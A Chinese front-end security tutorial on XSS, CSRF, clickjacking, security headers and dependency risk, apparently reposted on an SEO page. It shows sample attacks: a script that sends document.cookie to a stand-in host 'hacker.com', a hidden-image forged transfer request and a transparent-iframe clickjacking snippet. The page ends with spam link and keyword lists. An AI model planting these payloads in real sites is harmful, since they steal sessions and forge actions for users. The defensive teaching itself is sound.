当前位置: 首页 > wzjs >正文

政务网站建设浙江项目管理师

政务网站建设浙江,项目管理师,工程公司取名大全,海淀网站建设价格一、跨站脚本攻击(XSS) 攻击原理 定义:攻击者向页面注入恶意脚本(如 JavaScript),在用户浏览时执行,窃取 Cookie、篡改页面等。分类: 存储型 XSS:恶意脚本存储到服务器…

一、跨站脚本攻击(XSS)

攻击原理
  • 定义:攻击者向页面注入恶意脚本(如 JavaScript),在用户浏览时执行,窃取 Cookie、篡改页面等。
  • 分类
    • 存储型 XSS:恶意脚本存储到服务器(如评论区)。
    • 反射型 XSS:恶意脚本通过 URL 参数反射到页面。
    • DOM 型 XSS:前端直接操作 DOM 导致漏洞。
图文案例

攻击代码

用户提交评论内容:
<script>fetch('https://hacker.com/steal?cookie=' + document.cookie)</script>
防护措施
  1. 输入过滤:对用户输入进行转义(如将 < 转义为 &lt;)。
  2. 输出编码
    // 使用框架内置的编码函数
    const safeOutput = _.escape(userInput); // Lodash
    
  3. 设置 HTTP 头
    Content-Security-Policy: script-src 'self' 禁止加载外部脚本
    

二、跨站请求伪造(CSRF)

攻击原理
  • 定义:诱导用户访问恶意页面,利用已登录状态伪造用户身份发起请求(如转账)。
  • 核心条件:用户已登录目标网站且未登出。

攻击代码

<img src="https://bank.com/transfer?to=hacker&amount=10000" style="display:none">
防护措施
  1. CSRF Token
    <form action="/transfer"><input type="hidden" name="csrf_token" value="{{csrfToken}}">
    </form>
    
  2. SameSite Cookie
    Set-Cookie: sessionId=abc123; SameSite=Strict
    
  3. 验证 Referer/Origin:检查请求来源是否合法。

三、点击劫持(Clickjacking)

攻击原理
  • 定义:攻击者通过透明 iframe 覆盖在正常页面上,诱导用户点击隐藏按钮(如点赞、关注)。

攻击代码

<style>iframe {opacity: 0;position: absolute;top: 0;left: 0;}
</style>
<iframe src="https://social.com/like?post=123"></iframe>
防护措施
  1. 设置 X-Frame-Options
    X-Frame-Options: DENY  // 禁止页面被嵌入 iframe
    
  2. 使用 CSP
    Content-Security-Policy: frame-ancestors 'none'
    

四、浏览器安全策略

1. 同源策略(Same-Origin Policy)
  • 规则:禁止页面读取不同源(协议+域名+端口)的资源。
  • 绕过风险:错误配置 CORS 导致数据泄露。
2. 内容安全策略(CSP)
  • 配置示例
    Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted-cdn.com
    
3. 安全头配置
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff

五、第三方依赖风险

案例:恶意 npm 包
  • 事件event-stream 包被注入恶意代码,窃取比特币钱包。
  • 防护
    1. 使用 npm audit 检查依赖漏洞。
    2. 锁定版本号(package-lock.json)。
    3. 使用 Snyk、Dependabot 扫描依赖。

六、安全防护工具

  1. 浏览器 DevTools
    • 检查 Network 请求中的敏感信息泄露。
    • 使用 Security 面板查看 HTTPS 和 CSP 状态。
  2. 自动化扫描
    • OWASP ZAP:检测 XSS、SQL 注入等漏洞。
    • Lighthouse:审计安全头配置。

总结:前端安全防护清单

风险类型防护手段
XSS输入过滤、输出编码、CSP、避免 innerHTML
CSRFCSRF Token、SameSite Cookie、验证 Referer
点击劫持X-Frame-Options、CSP 的 frame-ancestors
数据泄露禁用 document.cookie、敏感数据不存 localStorage
第三方依赖定期更新依赖、使用 npm audit
HTTPS全站 HTTPS、HSTS 头、禁用混合内容(HTTP 资源)

文章转载自:

http://1zZY926D.jngdh.cn
http://ptBFj1uO.jngdh.cn
http://bTKdKFxF.jngdh.cn
http://dKhmmNh9.jngdh.cn
http://Rf6iJkDj.jngdh.cn
http://vIOM9k9N.jngdh.cn
http://3zXTsFA2.jngdh.cn
http://vPyb9eKr.jngdh.cn
http://Z9FCrGCp.jngdh.cn
http://DWN0ZF5Y.jngdh.cn
http://e9RTcFUp.jngdh.cn
http://yi500mSU.jngdh.cn
http://pEg3Clv8.jngdh.cn
http://2kKuGzL2.jngdh.cn
http://xO8Ul4KN.jngdh.cn
http://r0Is2l8z.jngdh.cn
http://LecfSp47.jngdh.cn
http://XeD1KnQM.jngdh.cn
http://pEGejDcC.jngdh.cn
http://ufr05Zii.jngdh.cn
http://FIe7wZGU.jngdh.cn
http://VcNNYA2Q.jngdh.cn
http://69zfT0NU.jngdh.cn
http://sxxutB5E.jngdh.cn
http://N6DTgCIf.jngdh.cn
http://UZlAfDP5.jngdh.cn
http://0Hqhe4Vp.jngdh.cn
http://ad2sLgMJ.jngdh.cn
http://pLKDRPda.jngdh.cn
http://16p5HdaU.jngdh.cn
http://www.dtcms.com/wzjs/703646.html

相关文章:

  • 我有网网站建设有wordpress使用经验
  • wdcp网站建设wordpress 加文章分享
  • 网站开发介绍人拿多少钱手机怎么同步连接wordpress
  • 广州网站建设公司小程序合肥工程建设信息平台
  • mooc网站开发案例wordpress群晖套件
  • 用python做网站wordpress 忘记数据库密码
  • 富阳做网站方式手工业网站怎么做
  • 做外贸做什么网站好网站建设工作分解
  • 西安响应式网站建设服务提供商个人网页制作成品免费下载
  • 线上推广媒体广告seo指的是搜索引擎营销
  • 建设假网站如何做优化网站排alexa优化
  • 房地产做网站不移动开发是什么
  • 为什么做的网站别的浏览器打不开怎么办网站建设学习浩森宇特
  • 建设银行手机银行官方网站下载安装国际转运网站建设
  • 网站推广费用大概需要多少钱wordpress更改域名
  • 企业开源建站系统百度官方app免费下载
  • 宝山北京网站建设佛山网络公司 乐云seo
  • 销售网站内容设计方案建网站的宽带多少钱
  • 桥东区网站建设网页制作个人简介页面模板
  • 大连网络宣传网站中国十大权威新闻媒体
  • 设计公司的网站详情专业的网站建设费用
  • 襄阳做网站价格郑州商城网站制作
  • 用vps刷网站流量要怎么做苏州优化平台
  • 网站开发淄博明朝传奇网页游戏
  • 免费的行情网站推荐大全枣庄定制网站建设制作
  • 平面设计官方网站西安市建设工程信息网诚信信息平台诚信承诺书在哪儿下载
  • wordpress 作品集网站北京优化生育
  • 企业网站管理系统 asp推广网址
  • 生物医药基地网站建设网站建设难吗
  • 做网站一定要域名嘛网站后台打打开空白